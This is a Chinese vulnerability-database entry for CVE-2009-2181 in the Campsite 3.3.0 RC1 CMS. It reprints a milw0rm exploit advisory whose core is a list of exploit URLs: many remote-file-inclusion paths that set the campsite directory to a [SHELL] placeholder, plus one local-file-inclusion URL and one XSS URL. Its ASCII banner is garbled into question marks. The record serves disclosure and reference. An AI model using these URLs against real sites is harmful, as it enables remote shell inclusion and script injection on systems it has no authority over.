Campsite list_dir.php跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117995 漏洞类型 跨站脚本
发布时间 2009-06-22 更新时间 2009-06-24
CVE编号 CVE-2009-2181 CNNVD-ID CNNVD-200906-380
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/8995
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200906-380
|漏洞详情
Campsite3.3.0RC1的admin-files/templates/list_dir.php中存在跨站脚本攻击漏洞。远程攻击者可以借助listbasedir参数,注入任意web脚本或HTML。
|漏洞EXP
????????????????????????????????????????????????????????????????????????????????????
??                                C r a C k E r                                   ??
??             T H E   C R A C K   O F   E T E R N A L   M I G H T                ??
????????????????????????????????????????????????????????????????????????????????????

 ?????         From The Ashes and Dust Rises An Unimaginable crack....         ?????
????????????????????????????????????????????????????????????????????????????????????
??         [ Remote File Include ]     [ Local File Include ]     [ XSS ]         ??
????????????????????????????????????????????????????????????????????????????????????
:   Author   : CraCkEr                   : :                                       :
?   Script   : Campsite 3.3.0 RC1        ? ?          Register Globals :           ?
?   Download : sourceforge.net           ? ?                                       ?
?   Method   : GET                       ? ?           [?] ON   [ ] OFF            ?
?   Critical : High [????????]           ? ?                                       ?
?   Impact   : system information        ? ?                                       ?
? ???????????????????????????????????????? ??????????????????????????????????????? ?
?                                 DALnet #crackers                                ??
????????????????????????????????????????????????????????????????????????????????????
:                                                                                  :
?  Release Notes:                                                                  ?
?  ?????????????                                                                   ?
?  Typically used for remotely exploitable vulnerabilities that can lead to        ?
?  system compromise.                                                              ?
?                                                                                  ?

????????????????????????????????????????????????????????????????????????????????????
??                                Exploit URL's                                   ??
????????????????????????????????????????????????????????????????????????????????????

[RFI]

http://localhost/path/implementation/site/admin-files/ad_popup.php?GLOBALS[g_campsiteDir]=[SHELL]
http://localhost/path/implementation/site/admin-files/camp_html.php?GLOBALS[g_campsiteDir]=[SHELL]
http://localhost/path/implementation/site/admin-files/init_content.php?GLOBALS[g_campsiteDir]=[SHELL]
http://localhost/path/implementation/site/admin-files/logout.php?GLOBALS[g_campsiteDir]=[SHELL]
http://localhost/path/implementation/site/admin-files/menu.php?GLOBALS[g_campsiteDir]=[SHELL]
http://localhost/path/implementation/site/admin-files/set-author.php?GLOBALS[g_campsiteDir]=[SHELL]
http://localhost/path/implementation/site/conf/liveuser_configuration.php?GLOBALS[g_campsiteDir]=[SHELL]
http://localhost/path/implementation/site/include/phorum_load.php?GLOBALS[g_campsiteDir]=[SHELL]
http://localhost/path/implementation/site/admin-files/article_import/CommandProcessor.php?GLOBALS[g_campsiteDir]=[SHELL]
http://localhost/path/implementation/site/admin-files/article_import/index.php?GLOBALS[g_campsiteDir]=[SHELL]
http://localhost/path/implementation/site/admin-files/articles/add.php?GLOBALS[g_campsiteDir]=[SHELL]
http://localhost/path/implementation/site/admin-files/articles/add_move.php?GLOBALS[g_campsiteDir]=[SHELL]
http://localhost/path/implementation/site/admin-files/articles/autopublish.php?GLOBALS[g_campsiteDir]=[SHELL]
http://localhost/path/implementation/site/admin-files/articles/autopublish_del.php?GLOBALS[g_campsiteDir]=[SHELL]

[LFI]

http://localhost/path/implementation/site/admin-files/ad.php?GLOBALS[g_campsiteDir]=[LFI]


[XSS]

http://localhost/path/implementation/site/admin-files/templates/list_dir.php?listbasedir=[XSS]

   
????????????????????????????????????????????????????????????????????????????????????
 
Greets:
       The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL, rd0 .

????????????????????????????????????????????????????????????????????????????????????
??                                 © CraCkEr 2009                                 ??
????????????????????????????????????????????????????????????????????????????????????

# milw0rm.com [2009-06-22]
|参考资料

来源:MILW0RM
名称:8995
链接:http://www.milw0rm.com/exploits/8995
来源:OSVDB
名称:55313
链接:http://osvdb.org/55313